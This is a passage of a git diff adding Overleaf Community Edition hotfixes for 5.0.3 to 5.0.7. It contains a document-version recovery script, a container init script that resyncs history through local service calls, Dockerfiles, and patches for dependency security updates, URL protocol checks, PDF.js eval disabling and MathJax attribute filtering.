This will take a while.') + await runRecovery() + } + await db.migrations.deleteOne({ name: BAD_MIGRATION_NAME }) + console.log('Done.') +} + +async function runRecovery() { + let batch = [] + const summary = { + updated: 0, + ignored: 0, + skipped: 0, + deletedUpdated: 0, + deletedIgnored: 0, + } + const processBatchAndLogProgress = async () => { + try { + await BPromise.map(batch, project => processProject(project, summary), { + concurrency: OPTIONS.concurrency, + }) + } finally { + console.log(`${summary.updated} projects updated`) + console.log(`${summary.ignored} projects had good versions`) + console.log(`${summary.deletedUpdated} deleted projects updated`) + console.log( + `${summary.deletedIgnored} deleted projects had good versions` + ) + console.log(`${summary.skipped} projects skipped`) + } + batch = [] + } + + await printDBStats() + await touchResyncsNeededFile() + for await (const project of getProjects()) { + batch.push(project) + if (batch.length >= BATCH_SIZE) { + await processBatchAndLogProgress() + } + } + + for await (const deletedProject of getDeletedProjects()) { + const project = deletedProject.project + project.isDeleted = true + batch.push(project) + if (batch.length >= BATCH_SIZE) { + await processBatchAndLogProgress() + } + } + + if (batch.length > 0) { + await processBatchAndLogProgress() + } + + await backfillMissingVersions() +} + +async function printDBStats() { + const projects = await db.projects.estimatedDocumentCount() + const docs = await db.docs.estimatedDocumentCount() + console.log( + `Need to check ${projects} projects with a total of ${docs} docs.` + ) +} + +async function touchResyncsNeededFile() { + if (OPTIONS['resyncs-needed-file']) { + await fsPromises.appendFile(OPTIONS['resyncs-needed-file'], '') + } +} + +function getProjects() { + return db.projects.find({}, { projection: { _id: 1, overleaf: 1 } }) +} + +function getDeletedProjects() { + return db.deletedProjects.find( + { project: { $ne: null } }, + { projection: { 'project._id': 1, 'project.overleaf': 1 } } + ) +} + +async function processProject(project, summary) { + const projectId = project._id.toString() + let updated = false + try { + const historyDocVersions = await getHistoryDocVersions(project) + + for (const { docId, version } of historyDocVersions) { + const update = await fixMongoDocVersion(docId, version) + if (update != null) { + updated = true + } + } + + if (project.isDeleted) { + if (updated) { + summary.deletedUpdated += 1 + } else { + summary.deletedIgnored += 1 + } + } else { + await recordProjectNeedsResync(projectId) + if (updated) { + summary.updated += 1 + } else { + summary.ignored += 1 + } + } + } catch (err) { + logger.error({ err, projectId }, 'Failed to process project') + if (OPTIONS['skip-history-failures']) { + summary.skipped += 1 + } else { + throw err + } + } +} + +async function getHistoryDocVersions(project) { + const historyId = project.overleaf.history.id + const chunk = await chunkStore.loadLatest(historyId) + if (chunk == null) { + return [] + } + + const snapshot = chunk.getSnapshot() + const changes = chunk.getChanges() + snapshot.applyAll(changes) + const v2DocVersions = snapshot.getV2DocVersions() + if (v2DocVersions == null) { + return [] + } + return Object.entries(v2DocVersions.data).map(([docId, versionInfo]) => ({ + docId, + version: versionInfo.v, + })) +} + +async function fixMongoDocVersion(docId, historyVersion) { + const docBeforeUpdate = await db.docs.findOneAndUpdate( + { + _id: new ObjectId(docId), + $or: [ + { version: { $lte: 
historyVersion } }, + { version: { $exists: false } }, + ], + }, + { $set: { version: historyVersion + 1 } } + ) + if (docBeforeUpdate != null) { + return { + previousVersion: docBeforeUpdate.version, + newVersion: historyVersion + 1, + } + } else { + return null + } +} + +/** + * Set all remaining versions to 0 + */ +async function backfillMissingVersions() { + console.log('Defaulting version to 0 for remaining docs.') + await db.docs.updateMany( + { version: { $exists: false } }, + { $set: { version: 0 } } + ) +} + +main() + .finally(async () => { + console.log('Flushing log queue.') + await flushLogQueue() + }) + .then(() => { + process.exit(0) + }) + .catch(err => { + console.error(err) + process.exit(1) + }) diff --git a/server-ce/hotfix/5.0.3/910_initiate_doc_version_recovery b/server-ce/hotfix/5.0.3/910_initiate_doc_version_recovery new file mode 100755 index 0000000..b5f9ce2 --- /dev/null +++ b/server-ce/hotfix/5.0.3/910_initiate_doc_version_recovery @@ -0,0 +1,51 @@ +#!/bin/bash + +set -euo pipefail + +source /etc/container_environment.sh +source /etc/overleaf/env.sh + +LOG_FILE=/var/lib/overleaf/data/history/doc-version-recovery.log +RESYNCS_NEEDED_FILE=/var/lib/overleaf/data/history/doc-version-recovery-resyncs-5.0.3.log + +echo "Checking for doc version recovery. This can take a while if needed. Logs are in $LOG_FILE" +cd /overleaf/services/history-v1 +LOG_LEVEL=info DOC_VERSION_RECOVERY_RESYNCS_NEEDED_FILE="$RESYNCS_NEEDED_FILE" node storage/scripts/recover_doc_versions.js 2>&1 | tee -a "$LOG_FILE" + +function resyncAllProjectsInBackground() { + waitForService docstore 3016 + waitForService document-updater 3003 + waitForService filestore 3009 + waitForService history-v1 3100 + waitForService project-history 3054 + waitForService web-api 4000 + + # Resync files that had their versions updated + while read -r project_id; do + echo "Resyncing project $project_id..." + curl -X POST --silent "http://127.0.0.1:3054/project/$project_id/resync?force=true" + done < "$RESYNCS_NEEDED_FILE" + + # Resync files that have broken histories + /overleaf/bin/force-history-resyncs + + echo "Finished resyncing history for all projects. Adding .done suffix to log file" + mv "$RESYNCS_NEEDED_FILE" "$RESYNCS_NEEDED_FILE.done" +} + +function waitForService() { + local name=$1 + local port=$2 + while ! curl --fail --silent "http://127.0.0.1:$port/status"; do + echo "Waiting for $name service to start up" + sleep 10 + done +} + +if [ -f "$RESYNCS_NEEDED_FILE" ]; then + echo "Finished recovery of doc versions. Resyncing history for all projects in the background." + resyncAllProjectsInBackground & +else + echo "No recovery of doc versions needed." +fi + diff --git a/server-ce/hotfix/5.0.3/Dockerfile b/server-ce/hotfix/5.0.3/Dockerfile new file mode 100644 index 0000000..79be043 --- /dev/null +++ b/server-ce/hotfix/5.0.3/Dockerfile @@ -0,0 +1,7 @@ +FROM sharelatex/sharelatex:5.0.2-RC6 + +# Patch: https://github.com/overleaf/internal/pull/18065 +RUN npm install @overleaf/redis-wrapper @overleaf/settings -w services/history-v1 +ADD 910_initiate_doc_version_recovery /etc/my_init.d/910_initiate_doc_version_recovery +COPY pr_18065.patch . 
+RUN patch -p0 < pr_18065.patch && rm pr_18065.patch diff --git a/server-ce/hotfix/5.0.3/pr_18065.patch b/server-ce/hotfix/5.0.3/pr_18065.patch new file mode 100644 index 0000000..4fe440f --- /dev/null +++ b/server-ce/hotfix/5.0.3/pr_18065.patch @@ -0,0 +1,307 @@ +--- services/history-v1/storage/scripts/recover_doc_versions.js ++++ services/history-v1/storage/scripts/recover_doc_versions.js +@@ -2,6 +2,10 @@ const fsPromises = require('fs/promises') + const { ObjectId } = require('mongodb') + const BPromise = require('bluebird') + const logger = require('@overleaf/logger') ++const Settings = require('@overleaf/settings') ++const rclient = require('@overleaf/redis-wrapper').createClient( ++ Settings.redis.documentupdater ++) + const mongodb = require('../lib/mongodb') + const { chunkStore } = require('..') + const Events = require('events') +@@ -28,8 +32,14 @@ const db = { + const BAD_MIGRATION_NAME = + '20231219081700_move_doc_versions_from_docops_to_docs' + ++const RECOVERY_FILES_502 = [ ++ '/var/lib/overleaf/data/history/doc-version-recovery-resyncs.log', ++ '/var/lib/overleaf/data/history/doc-version-recovery-resyncs.log.done', ++] ++ + let loggingChain = Promise.resolve() + const projectIdsThatNeedResyncing = [] ++const unflushedDocIds = new Set() + + async function flushLogQueue() { + const logPath = OPTIONS['resyncs-needed-file'] +@@ -55,23 +65,67 @@ async function recordProjectNeedsResync(projectId) { + } + + async function main() { ++ const recovery502Ran = await did502RecoveryRun() ++ await getUnflushedDocIds() + const badMigration = await db.migrations.findOne({ name: BAD_MIGRATION_NAME }) +- if (OPTIONS.force || badMigration != null) { ++ ++ if (unflushedDocIds.size > 0 && !recovery502Ran && badMigration != null) { ++ // Tell customers that they need to flush ++ console.log(` ++-------------------------------------------------------------------- ++Detected unflushed changes while recovering doc versions. ++Please go back to version 5.0.1 and follow the recovery procedure ++for flushing document updates: ++ ++https://github.com/overleaf/overleaf/wiki/Doc-version-recovery ++--------------------------------------------------------------------`) ++ process.exit(1) ++ } ++ ++ if (OPTIONS.force || recovery502Ran || badMigration != null) { + console.warn('Need to recover doc versions. This will take a while.') + await runRecovery() ++ await db.migrations.deleteOne({ name: BAD_MIGRATION_NAME }) ++ await delete502RecoveryFiles() + } +- await db.migrations.deleteOne({ name: BAD_MIGRATION_NAME }) ++ + console.log('Done.') + } + ++async function did502RecoveryRun() { ++ for (const file of RECOVERY_FILES_502) { ++ try { ++ await fsPromises.stat(file) ++ return true ++ } catch (err) { ++ // file doesn't exist. continue ++ } ++ } ++ return false ++} ++ ++async function delete502RecoveryFiles() { ++ for (const file of RECOVERY_FILES_502) { ++ try { ++ await fsPromises.rename(file, file.replace('.log', '-5.0.2.log')) ++ } catch (err) { ++ // file doesn't exist. 
continue ++ } ++ } ++} ++ + async function runRecovery() { + let batch = [] + const summary = { +- updated: 0, + ignored: 0, + skipped: 0, +- deletedUpdated: 0, ++ deletedUpdatedMongo: 0, ++ deletedUpdatedRedis: 0, ++ deletedUpdatedBoth: 0, + deletedIgnored: 0, ++ updatedMongo: 0, ++ updatedRedis: 0, ++ updatedBoth: 0, + } + const processBatchAndLogProgress = async () => { + try { +@@ -79,9 +133,21 @@ async function runRecovery() { + concurrency: OPTIONS.concurrency, + }) + } finally { +- console.log(`${summary.updated} projects updated`) ++ console.log(`${summary.updatedRedis} projects updated in Redis`) ++ console.log(`${summary.updatedMongo} projects updated in Mongo`) ++ console.log( ++ `${summary.updatedBoth} projects updated in both Mongo and Redis` ++ ) + console.log(`${summary.ignored} projects had good versions`) +- console.log(`${summary.deletedUpdated} deleted projects updated`) ++ console.log( ++ `${summary.deletedUpdatedMongo} deleted projects updated in Mongo` ++ ) ++ console.log( ++ `${summary.deletedUpdatedRedis} deleted projects updated in Redis` ++ ) ++ console.log( ++ `${summary.deletedUpdatedBoth} deleted projects updated in both Mongo and Redis` ++ ) + console.log( + `${summary.deletedIgnored} deleted projects had good versions` + ) +@@ -91,7 +157,7 @@ async function runRecovery() { + } + + await printDBStats() +- await touchResyncsNeededFile() ++ await initResyncsNeededFile() + for await (const project of getProjects()) { + batch.push(project) + if (batch.length >= BATCH_SIZE) { +@@ -115,17 +181,38 @@ async function runRecovery() { + await backfillMissingVersions() + } + ++async function getUnflushedDocIds() { ++ const batchSize = 1000 ++ let cursor = '0' ++ do { ++ const [newCursor, keys] = await rclient.scan( ++ cursor, ++ 'MATCH', ++ Settings.redis.documentupdater.key_schema.docVersion({ doc_id: '*' }), ++ 'COUNT', ++ batchSize ++ ) ++ for (const key of keys) { ++ unflushedDocIds.add(key.slice('DocVersion:'.length)) ++ } ++ cursor = newCursor ++ } while (cursor !== '0') ++} ++ + async function printDBStats() { + const projects = await db.projects.estimatedDocumentCount() ++ const deletedProjects = await db.deletedProjects.countDocuments() + const docs = await db.docs.estimatedDocumentCount() + console.log( +- `Need to check ${projects} projects with a total of ${docs} docs.` ++ `Need to check ${projects} projects and up-to ${deletedProjects} deleted projects with a total of ${docs} docs.` + ) + } + +-async function touchResyncsNeededFile() { +- if (OPTIONS['resyncs-needed-file']) { +- await fsPromises.appendFile(OPTIONS['resyncs-needed-file'], '') ++async function initResyncsNeededFile() { ++ const logPath = OPTIONS['resyncs-needed-file'] ++ if (logPath) { ++ await fsPromises.writeFile(logPath, '') ++ await fsPromises.rm(`${logPath}.done`, { force: true }) + } + } + +@@ -135,34 +222,47 @@ function getProjects() { + + function getDeletedProjects() { + return db.deletedProjects.find( +- { project: { $ne: null } }, ++ { 'project.overleaf.history.id': { $exists: true } }, + { projection: { 'project._id': 1, 'project.overleaf': 1 } } + ) + } + + async function processProject(project, summary) { + const projectId = project._id.toString() +- let updated = false ++ let updatedMongo = false ++ let updatedRedis = false + try { + const historyDocVersions = await getHistoryDocVersions(project) + + for (const { docId, version } of historyDocVersions) { +- const update = await fixMongoDocVersion(docId, version) ++ const update = await fixDocVersion(docId, version) + if (update 
!= null) { +- updated = true ++ if (update.in === 'mongo') { ++ updatedMongo = true ++ } else if (update.in === 'redis') { ++ updatedRedis = true ++ } + } + } + + if (project.isDeleted) { +- if (updated) { +- summary.deletedUpdated += 1 ++ if (updatedMongo && updatedRedis) { ++ summary.deletedUpdatedBoth += 1 ++ } else if (updatedMongo) { ++ summary.deletedUpdatedMongo += 1 ++ } else if (updatedRedis) { ++ summary.deletedUpdatedRedis += 1 + } else { + summary.deletedIgnored += 1 + } + } else { + await recordProjectNeedsResync(projectId) +- if (updated) { +- summary.updated += 1 ++ if (updatedMongo && updatedRedis) { ++ summary.updatedBoth += 1 ++ } else if (updatedMongo) { ++ summary.updatedMongo += 1 ++ } else if (updatedRedis) { ++ summary.updatedRedis += 1 + } else { + summary.ignored += 1 + } +@@ -197,25 +297,61 @@ async function getHistoryDocVersions(project) { + })) + } + +-async function fixMongoDocVersion(docId, historyVersion) { +- const docBeforeUpdate = await db.docs.findOneAndUpdate( +- { +- _id: new ObjectId(docId), +- $or: [ +- { version: { $lte: historyVersion } }, +- { version: { $exists: false } }, +- ], +- }, +- { $set: { version: historyVersion + 1 } } +- ) +- if (docBeforeUpdate != null) { ++async function fixDocVersion(docId, historyVersion) { ++ const redisVersion = await getRedisDocVersion(docId) ++ if (redisVersion != null && historyVersion >= redisVersion) { ++ await setRedisDocVersion(docId, historyVersion + 1) + return { +- previousVersion: docBeforeUpdate.version, ++ in: 'redis', ++ previousVersion: redisVersion, + newVersion: historyVersion + 1, + } + } else { ++ const docBeforeUpdate = await db.docs.findOneAndUpdate( ++ { ++ _id: new ObjectId(docId), ++ $or: [ ++ { version: { $lte: historyVersion } }, ++ { version: { $exists: false } }, ++ ], ++ }, ++ { $set: { version: historyVersion + 1 } }, ++ { projection: { _id: 1, version: 1 } } ++ ) ++ ++ if (docBeforeUpdate != null) { ++ return { ++ in: 'mongo', ++ previousVersion: docBeforeUpdate.version, ++ newVersion: historyVersion + 1, ++ } ++ } else { ++ return null ++ } ++ } ++} ++ ++async function getRedisDocVersion(docId) { ++ if (!unflushedDocIds.has(docId)) { + return null + } ++ const result = await rclient.get( ++ Settings.redis.documentupdater.key_schema.docVersion({ doc_id: docId }) ++ ) ++ if (result == null) { ++ return null ++ } ++ return parseInt(result, 10) ++} ++ ++async function setRedisDocVersion(docId, version) { ++ const multi = rclient.multi() ++ multi.set( ++ Settings.redis.documentupdater.key_schema.docVersion({ doc_id: docId }), ++ version ++ ) ++ multi.set(`UnflushedTime:{${docId}}`, Date.now(), 'NX') ++ await multi.exec() + } + + /** diff --git a/server-ce/hotfix/5.0.4/Dockerfile b/server-ce/hotfix/5.0.4/Dockerfile new file mode 100644 index 0000000..e5def9d --- /dev/null +++ b/server-ce/hotfix/5.0.4/Dockerfile @@ -0,0 +1,30 @@ +FROM sharelatex/sharelatex:5.0.3 + +# apply an override to the swagger-tools package to force security updates to multer and qs +# from https://github.com/overleaf/internal/pull/18433 +COPY pr_18433.patch . 
+RUN patch -p1 < pr_18433.patch && rm pr_18433.patch
+RUN npm install --include-workspace-root -w services/history-v1 swagger-tools@0.10.4 && rm -rf /root/.cache /root/.npm $(find /tmp/ -mindepth 1 -maxdepth 1)
+
+# remove google-cloud packages which are unused in server-pro and have a vulnerable dependency
+RUN npm uninstall -w libraries/logger @google-cloud/logging-bunyan
+RUN npm uninstall -w libraries/metrics @google-cloud/opentelemetry-cloud-trace-exporter @google-cloud/profiler
+
+# the passport-twitter package has been removed from the monorepo
+RUN npm uninstall -w services/web passport-twitter
+
+# remove the unused services/web/scripts/translations directory
+RUN rm -r services/web/scripts/translations
+
+# Validate URL protocol before opening from Visual Editor tooltip
+# from https://github.com/overleaf/internal/pull/18393
+COPY pr_18393.patch .
+RUN patch -p1 < pr_18393.patch && rm pr_18393.patch
+
+# Set isEvalSupported to false when loading a PDF document
+# from https://github.com/overleaf/internal/pull/18444
+COPY pr_18444.patch .
+RUN patch -p1 < pr_18444.patch && rm pr_18444.patch
+
+# ensure that the vulnerability audit is run after all changes
+RUN npm audit --audit-level=high
diff --git a/server-ce/hotfix/5.0.4/pr_18393.patch b/server-ce/hotfix/5.0.4/pr_18393.patch
new file mode 100644
index 0000000..13da910
--- /dev/null
+++ b/server-ce/hotfix/5.0.4/pr_18393.patch
@@ -0,0 +1,111 @@
+diff --git a/services/web/frontend/js/features/source-editor/components/command-tooltip/href-tooltip.tsx b/services/web/frontend/js/features/source-editor/components/command-tooltip/href-tooltip.tsx
+index a0d681d9cb5..2f9a4333cd6 100644
+--- a/services/web/frontend/js/features/source-editor/components/command-tooltip/href-tooltip.tsx
++++ b/services/web/frontend/js/features/source-editor/components/command-tooltip/href-tooltip.tsx
+@@ -17,6 +17,7 @@ import {
+ } from 'react-bootstrap'
+ import Icon from '../../../../shared/components/icon'
+ import { EditorState } from '@codemirror/state'
++import { openURL } from '@/features/source-editor/utils/url'
+
+ export const HrefTooltipContent: FC = () => {
+   const state = useCodeMirrorStateContext()
+@@ -108,7 +109,7 @@ export const HrefTooltipContent: FC = () => {
+           className="ol-cm-command-tooltip-link"
+           onClick={() => {
+             // TODO: unescape content
+-            window.open(url, '_blank')
++            openURL(url)
+           }}
+         >
+
+diff --git a/services/web/frontend/js/features/source-editor/components/command-tooltip/url-tooltip.tsx b/services/web/frontend/js/features/source-editor/components/command-tooltip/url-tooltip.tsx
+index c51b497de01..632d71dd031 100644
+--- a/services/web/frontend/js/features/source-editor/components/command-tooltip/url-tooltip.tsx
++++ b/services/web/frontend/js/features/source-editor/components/command-tooltip/url-tooltip.tsx
+@@ -9,6 +9,7 @@ import {
+ } from '../../lezer-latex/latex.terms.mjs'
+ import Icon from '../../../../shared/components/icon'
+ import { EditorState } from '@codemirror/state'
++import { openURL } from '@/features/source-editor/utils/url'
+
+ export const UrlTooltipContent: FC = () => {
+   const { t } = useTranslation()
+@@ -23,7 +24,7 @@ export const UrlTooltipContent: FC = () => {
+       onClick={() => {
+         const url = readUrl(state)
+         if (url) {
+-          window.open(url, '_blank')
++          openURL(url)
+         }
+       }}
+     >
+diff --git a/services/web/frontend/js/features/source-editor/utils/url.ts b/services/web/frontend/js/features/source-editor/utils/url.ts
+new file mode 100644
+index
00000000000..8bfc9bdeab8 +--- /dev/null ++++ b/services/web/frontend/js/features/source-editor/utils/url.ts +@@ -0,0 +1,11 @@ ++const ALLOWED_PROTOCOLS = ['https:', 'http:'] ++ ++export const openURL = (content: string) => { ++ const url = new URL(content, document.location.href) ++ ++ if (!ALLOWED_PROTOCOLS.includes(url.protocol)) { ++ throw new Error(`Not opening URL with protocol ${url.protocol}`) ++ } ++ ++ window.open(url, '_blank') ++} +diff --git a/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-command-tooltip.spec.tsx b/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-command-tooltip.spec.tsx +index 837f90a64ab..d46b522a116 100644 +--- a/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-command-tooltip.spec.tsx ++++ b/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-command-tooltip.spec.tsx +@@ -54,8 +54,8 @@ describe(' command tooltip in Visual mode', function () { + // open the link + cy.findByRole('button', { name: 'Go to page' }).click() + cy.get('@window-open').should( +- 'have.been.calledOnceWithExactly', +- 'https://example.com', ++ 'have.been.calledWithMatch', ++ Cypress.sinon.match.has('href', 'https://example.com/'), + '_blank' + ) + +@@ -112,8 +112,8 @@ describe(' command tooltip in Visual mode', function () { + // open the link + cy.findByRole('button', { name: 'Go to page' }).click() + cy.get('@window-open').should( +- 'have.been.calledOnceWithExactly', +- 'https://example.com', ++ 'have.been.calledWithMatch', ++ Cypress.sinon.match.has('href', 'https://example.com/'), + '_blank' + ) + }) +diff --git a/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-tooltips.spec.tsx b/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-tooltips.spec.tsx +index c6e28f9eeeb..106a80ba187 100644 +--- a/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-tooltips.spec.tsx ++++ b/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-tooltips.spec.tsx +@@ -42,8 +42,8 @@ describe(' tooltips in Visual mode', function () { + }) + cy.findByRole('button', { name: 'Go to page' }).click() + cy.get('@open-window').should( +- 'have.been.calledOnceWithExactly', +- 'https://example.com/foo', ++ 'have.been.calledWithMatch', ++ Cypress.sinon.match.has('href', 'https://example.com/foo'), + '_blank' + ) + cy.findByRole('button', { name: 'Remove link' }).click() +@@ -62,8 +62,8 @@ describe(' tooltips in Visual mode', function () { + }) + cy.findByRole('button', { name: 'Go to page' }).click() + cy.get('@open-window').should( +- 'have.been.calledOnceWithExactly', +- 'https://example.com', ++ 'have.been.calledWithMatch', ++ Cypress.sinon.match.has('href', 'https://example.com/'), + '_blank' + ) + }) diff --git a/server-ce/hotfix/5.0.4/pr_18433.patch b/server-ce/hotfix/5.0.4/pr_18433.patch new file mode 100644 index 0000000..1e14f23 --- /dev/null +++ b/server-ce/hotfix/5.0.4/pr_18433.patch @@ -0,0 +1,63 @@ +diff --git a/package-lock.json b/package-lock.json +index b9eba6086b..bb1a5cebaf 100644 +--- a/package-lock.json ++++ b/package-lock.json +@@ -70674,8 +70674,7 @@ + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==" + }, + "multer": { +- "version": "1.4.4", +- "resolved": "https://registry.npmjs.org/multer/-/multer-1.4.4.tgz", ++ "version": 
"https://registry.npmjs.org/multer/-/multer-1.4.4.tgz", + "integrity": "sha512-2wY2+xD4udX612aMqMcB8Ws2Voq6NIUPEtD1be6m411T4uDH/VtL9i//xvcyFlTVfRdaBsk7hV5tgrGQqhuBiw==", + "requires": { + "append-field": "^1.0.0", +@@ -76995,10 +76994,10 @@ + "js-yaml": "^3.3.1", + "json-refs": "^3.0.2", + "lodash": "^4.17.4", +- "multer": "^1.1.0", ++ "multer": "1.4.5-lts.1", + "parseurl": "^1.3.0", + "path-to-regexp": "^2.0.0", +- "qs": "^6.0.3", ++ "qs": "6.5.3", + "serve-static": "^1.10.0", + "spark-md5": "^3.0.0", + "superagent": "^3.5.2", +@@ -77035,7 +77034,7 @@ + "http-errors": "~1.6.2", + "iconv-lite": "0.4.19", + "on-finished": "~2.3.0", +- "qs": "6.5.1", ++ "qs": "6.5.3", + "raw-body": "2.3.2", + "type-is": "~1.6.15" + }, +@@ -77109,8 +77108,7 @@ + "integrity": "sha512-G6zHoVqC6GGTQkZwF4lkuEyMbVOjoBKAEybQUypI1WTkqinCOrq2x6U2+phkJ1XsEMTy4LjtwPI7HW+NVrRR2w==" + }, + "qs": { +- "version": "6.5.1", +- "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.1.tgz", ++ "version": "https://registry.npmjs.org/qs/-/qs-6.5.1.tgz", + "integrity": "sha512-eRzhrN1WSINYCDCbrz796z37LOe3m5tmW7RQf6oBntukAG1nmovJvhnwHHRMAfeoItc1m2Hk02WER2aQ/iqs+A==" + }, + "raw-body": { +diff --git a/package.json b/package.json +index f092472caf..329d4fc5ce 100644 +--- a/package.json ++++ b/package.json +@@ -1,6 +1,12 @@ + { + "name": "overleaf", + "private": true, ++ "overrides": { ++ "swagger-tools": { ++ "multer": "1.4.5-lts.1", ++ "qs": "6.5.3" ++ } ++ }, + "dependencies": { + "patch-package": "^8.0.0" + }, diff --git a/server-ce/hotfix/5.0.4/pr_18444.patch b/server-ce/hotfix/5.0.4/pr_18444.patch new file mode 100644 index 0000000..6e36129 --- /dev/null +++ b/server-ce/hotfix/5.0.4/pr_18444.patch @@ -0,0 +1,41 @@ +diff --git a/services/web/frontend/js/features/file-view/components/file-view-pdf.tsx b/services/web/frontend/js/features/file-view/components/file-view-pdf.tsx +index 4d3b80bb9a2..3efc61a2199 100644 +--- a/services/web/frontend/js/features/file-view/components/file-view-pdf.tsx ++++ b/services/web/frontend/js/features/file-view/components/file-view-pdf.tsx +@@ -33,7 +33,10 @@ const FileViewPdf: FC<{ + return + } + +- const pdf = await PDFJS.getDocument(preview.url).promise ++ const pdf = await PDFJS.getDocument({ ++ url: preview.url, ++ isEvalSupported: false, ++ }).promise + + // bail out if loading the PDF took too long + if (!mountedRef.current) { +diff --git a/services/web/frontend/js/features/pdf-preview/util/pdf-js-wrapper.js b/services/web/frontend/js/features/pdf-preview/util/pdf-js-wrapper.js +index 9b419b1397f..6a92630a215 100644 +--- a/services/web/frontend/js/features/pdf-preview/util/pdf-js-wrapper.js ++++ b/services/web/frontend/js/features/pdf-preview/util/pdf-js-wrapper.js +@@ -96,6 +96,7 @@ export default class PDFJSWrapper { + rangeChunkSize, + disableAutoFetch: true, + disableStream, ++ isEvalSupported: false, + textLayerMode: 2, // PDFJSViewer.TextLayerMode.ENABLE, + range: rangeTransport, + }) +diff --git a/services/web/frontend/js/features/source-editor/extensions/visual/visual-widgets/graphics.ts b/services/web/frontend/js/features/source-editor/extensions/visual/visual-widgets/graphics.ts +index 7321f9e02b5..f6c744aaec2 100644 +--- a/services/web/frontend/js/features/source-editor/extensions/visual/visual-widgets/graphics.ts ++++ b/services/web/frontend/js/features/source-editor/extensions/visual/visual-widgets/graphics.ts +@@ -143,7 +143,7 @@ export class GraphicsWidget extends WidgetType { + return + } + +- const pdf = await PDFJS.getDocument(url).promise ++ const pdf = await 
PDFJS.getDocument({ url, isEvalSupported: false }).promise + const page = await pdf.getPage(1) + + // bail out if loading the PDF took too long diff --git a/server-ce/hotfix/5.0.5/Dockerfile b/server-ce/hotfix/5.0.5/Dockerfile new file mode 100644 index 0000000..b9ad108 --- /dev/null +++ b/server-ce/hotfix/5.0.5/Dockerfile @@ -0,0 +1,12 @@ +FROM sharelatex/sharelatex:5.0.4 + +# Install dev dependencies as part of "genScript compile" +COPY pr_18570.patch . +RUN patch -p1 < pr_18570.patch && rm pr_18570.patch + +# Adopted from https://github.com/overleaf/internal/pull/18819 +COPY pr_18819.patch . +RUN patch -p1 < pr_18819.patch && rm pr_18819.patch + +# Recompile frontend assets +RUN node genScript compile | bash diff --git a/server-ce/hotfix/5.0.5/pr_18570.patch b/server-ce/hotfix/5.0.5/pr_18570.patch new file mode 100644 index 0000000..05bc9f5 --- /dev/null +++ b/server-ce/hotfix/5.0.5/pr_18570.patch @@ -0,0 +1,30 @@ +--- a/genScript.js ++++ b/genScript.js +@@ -5,16 +5,26 @@ console.log('set -ex') + + switch (process.argv.pop()) { + case 'install': +- console.log('npm ci') ++ console.log('npm install --omit=dev') + break + case 'compile': + for (const service of services) { + console.log('pushd', `services/${service.name}`) + switch (service.name) { + case 'web': ++ // Avoid downloading of cypress ++ console.log('export CYPRESS_INSTALL_BINARY=0') ++ ++ // install webpack and frontend dependencies ++ console.log('npm install --include=dev') ++ // install misplaced dependencies (fixed via 18389) ++ console.log('pushd ../../ && npm install --include=dev --workspaces=false && popd') ++ // run webpack + console.log('npm run webpack:production') + // drop webpack/babel cache + console.log('rm -rf node_modules/.cache') ++ // uninstall webpack and frontend dependencies ++ console.log('pushd ../../ && npm install --omit=dev && popd') + break + default: + console.log(`echo ${service.name} does not require a compilation`) diff --git a/server-ce/hotfix/5.0.5/pr_18819.patch b/server-ce/hotfix/5.0.5/pr_18819.patch new file mode 100644 index 0000000..8352565 --- /dev/null +++ b/server-ce/hotfix/5.0.5/pr_18819.patch @@ -0,0 +1,17 @@ +--- a/services/web/frontend/js/features/mathjax/load-mathjax.ts ++++ b/services/web/frontend/js/features/mathjax/load-mathjax.ts +@@ -64,6 +64,15 @@ export const loadMathJax = async (options?: { + .findID('Renderer') + .disable() + }, ++ ready() { ++ window.MathJax.startup.defaultReady() ++ const safe = window.MathJax.startup.document.safe ++ safe.filterAttributes.set('fontfamily', 'filterFontFamily') ++ safe.filterMethods.filterFontFamily = ( ++ _safe: any, ++ family: string ++ ) => family.split(/;/)[0] ++ }, + }, + } diff --git a/server-ce/hotfix/5.0.6/Dockerfile b/server-ce/hotfix/5.0.6/Dockerfile new file mode 100644 index 0000000..1e993dd --- /dev/null +++ b/server-ce/hotfix/5.0.6/Dockerfile @@ -0,0 +1,3 @@ +FROM sharelatex/sharelatex:5.0.5 + +# Server Pro only hotfix diff --git a/server-ce/hotfix/5.0.7/Dockerfile b/server-ce/hotfix/5.0.7/Dockerfile new file mode 100644 index 0000000..cb9c227 --- /dev/null +++ b/server-ce/hotfix/5.0.7/Dockerfile @@ -0,0 +1,13 @@ +FROM sharelatex/sharelatex:5.0.6 + +COPY pr_19293.patch . +RUN patch -p1 < pr_19293.patch && rm pr_19293.patch + +COPY pr_19296.patch . +RUN patch -p1 < pr_19296.patch && rm pr_19296.patch + +COPY pr_19297.patch . +RUN patch -p1 < pr_19297.patch && rm pr_19297.patch + +COPY pr_19071.patch . 
+RUN patch -p1 < pr_19071.patch && rm pr_19071.patch diff --git a/server-ce/hotfix/5.0.7/pr_19071.patch b/server-ce/hotfix/5.0.7/pr_19071.patch new file mode 100644 index 0000000..2e925e8 --- /dev/null +++ b/server-ce/hotfix/5.0.7/pr_19071.patch @@ -0,0 +1,37 @@ +--- a/services/web/app/src/Features/Collaborators/CollaboratorsInviteHandler.js ++++ b/services/web/app/src/Features/Collaborators/CollaboratorsInviteHandler.js +@@ -7,13 +7,16 @@ const UserGetter = require('../User/UserGetter') + const ProjectGetter = require('../Project/ProjectGetter') + const Crypto = require('crypto') + const NotificationsBuilder = require('../Notifications/NotificationsBuilder') ++const _ = require('lodash') + + const randomBytes = promisify(Crypto.randomBytes) + + const CollaboratorsInviteHandler = { + async getAllInvites(projectId) { + logger.debug({ projectId }, 'fetching invites for project') +- const invites = await ProjectInvite.find({ projectId }).exec() ++ const invites = await ProjectInvite.find({ projectId }) ++ .select('_id email sendingUserId projectId privileges createdAt expires') ++ .exec() + logger.debug( + { projectId, count: invites.length }, + 'found invites for project' +@@ -101,7 +104,15 @@ const CollaboratorsInviteHandler = { + logger.err({ err, projectId, email }, 'error sending messages for 